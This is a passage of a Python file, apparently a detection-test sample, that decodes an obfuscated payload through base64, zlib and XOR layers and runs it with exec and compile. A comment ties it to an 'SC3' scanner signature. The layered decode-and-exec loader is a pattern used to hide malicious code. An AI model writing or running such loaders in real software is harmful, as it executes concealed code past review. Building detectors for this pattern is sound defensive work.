77uX/99taVZnhSwOlpqe9O1644NXrlNZBkKghZ8zEmgxWr5iMCiIbNToPnHHWqlKUKutSNfay83/cE6LX+Zzy+FT9+/ATpjkET"
_K = bytes.fromhex("04f00988b9f4b16d8bc37d86")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
